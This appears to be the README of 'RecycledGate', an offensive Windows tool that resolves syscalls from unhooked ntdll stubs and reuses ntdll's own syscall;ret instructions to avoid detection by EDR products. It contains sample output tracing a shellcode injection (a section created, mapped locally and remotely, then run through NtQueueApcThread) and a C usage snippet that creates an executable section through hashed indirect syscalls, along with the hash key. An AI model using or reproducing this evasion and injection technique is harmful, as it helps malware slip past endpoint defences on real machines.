RecycledGate
This is just another implementation of Hellsgate + Halosgate/Tartarusgate.
However, this implementation makes sure that all system calls still go through ntdll.dll to avoid the usage of direct systemcalls.
To do so, I parse the ntdll for nonhooked syscall-stubs and re-use existing syscall;ret
instructions - thus the name of this project.
This probably bypasses some EDR trying to detect abnormal systemcalls.
I have verified the sample program in this repository against syscall-detect by @winternl_t which uses the HookingNirvana technique to detect abnormal systemcalls.
.\Sample.exe HelloWorld.bin
[SYSCALL-DETECT] Console logging started...
[SYSCALL-DETECT] ntdll BaseAddress: 0x368508928
[SYSCALL-DETECT] win32u BaseAddress: 0x0
[*] Resolving Syscall: 916c6394
Found syscall using Halos gate
Found syscall; ret instruction
Syscall nr: 74
Gate: 00007FF9160100E2
[SNIP]
[*] Resolving Syscall: 8a4e6274
Found syscall using Halos gate
Found syscall; ret instruction
Syscall nr: 188
Gate: 00007FF916010F12
[*] Created section: 0x00000000000000B4
[*] Mapped section locally: 0x000001B244E50000
[*] Mapped section remote: 0x0000000000FE0000
[*] NtQueueApcThread successfull
[*] Resumed thread
The sample program can be found in the sample folder
Usage
Here is a snippet, which should be self-explanatory.
Syscall sysNtCreateSection = { 0x00 };
NTSTATUS ntStatus;
dwSuccess = getSyscall(0x916c6394, &sysNtCreateSection);
if (dwSuccess == FAIL)
goto exit;
PrepareSyscall(sysNtCreateSection.dwSyscallNr, sysNtCreateSection.pRecycledGate);
ntStatus = DoSyscall(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)&sizeBuffer, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(ntStatus)) {
printf("[-] Failed to create section\n");
goto exit;
}
Note:
- No lines of code should exist between the call to PrepareSyscall and DoSyscall
- The hash algorithm used is djb2. All hashes must be encrypted with the key 0x41424344. You can use the Hashgenerator in this repository
Credits
- Sektor7 for inventing and documenting Halosgate on which this project is based
- Sektor7 for the amazing windows evasion class
- @Am0nsec and @RtlMateusz for the original Hellsgate implementation
- @0xBoku for inspiration and his Halosgate implementation
- @trickster012 for the implementation of Tartarusgate
- @winternl_t for the amazing blogpost on detection of direct syscalls